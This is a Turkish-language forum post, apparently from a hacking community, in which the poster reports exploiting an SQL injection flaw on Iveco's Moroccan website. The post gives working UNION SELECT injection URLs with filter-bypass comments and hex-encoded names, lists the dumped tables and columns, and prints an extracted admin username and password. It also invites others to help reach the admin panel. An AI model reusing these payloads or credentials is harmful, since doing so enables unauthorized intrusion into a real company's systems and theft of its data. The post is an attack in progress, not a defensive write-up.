Merhaba Dostalarım;
İveco resmi web sitesinde SQL açığı tespit ettim bypass methodlarıyla gerekli verileri veritabanından çektim fakat admin panelini bulamadım into outfile ve load file Mysql kodlarıda denendi ama işe yaramadı umarım sizler bişeyler çıkarabilirsiniz bütün bilgileri aşağıda veriyorum;
Iveco Dump
Bypass SQL inject
Veritabanı ismi;
iveco_DATA
Tablolar;
Sonuç;
actualite
categorie
iproduit
iproduit_photo
irubrique
isous_rubrique
produit
sous_categorie
utilisateur >> (Kullanıcı)
utilisateur Kolon Verileri;
Sonuç;
id_utilisateur
nom
email
login
password
type
Kullanıcı adı Parola;
Sonuç;
admin:123456789
İveco resmi web sitesinde SQL açığı tespit ettim bypass methodlarıyla gerekli verileri veritabanından çektim fakat admin panelini bulamadım into outfile ve load file Mysql kodlarıda denendi ama işe yaramadı umarım sizler bişeyler çıkarabilirsiniz bütün bilgileri aşağıda veriyorum;
Bypass SQL inject
Veritabanı ismi;
iveco_DATA
Tablolar;
PHP:
http://www.iveco.ma/produit.php?id=-1+UNION+ALL+SELECT+1,2,(SELECT+GROUP_CONCAT(/*!50000table_name+SEPARATOR+0x3c62723e)+FROM+/*!50000INFORMATION_SCHEMA*/.TABLES+WHERE+TABLE_SCHEMA=0x697665636f5f44415441)
actualite
categorie
iproduit
iproduit_photo
irubrique
isous_rubrique
produit
sous_categorie
utilisateur >> (Kullanıcı)
utilisateur Kolon Verileri;
PHP:
http://www.iveco.ma/produit.php?id=-1+UNION+ALL+SELECT+1,2,(SELECT+GROUP_CONCAT(/*!50000column_name*/+SEPARATOR+0x3c62723e)+FROM+/*!50000INFORMATION_SCHEMA*/.COLUMNS+WHERE+/*!50000TABLE_NAME*/=0x7574696c69736174657572)
id_utilisateur
nom
login
password
type
Kullanıcı adı Parola;
PHP:
http://www.iveco.ma/produit.php?id=-1+UNION+ALL+SELECT+1,2,(SELECT+GROUP_CONCAT(email,login,0x3a,password+SEPARATOR+0x3c62723e)+FROM+iveco_DATA.utilisateur)
admin:123456789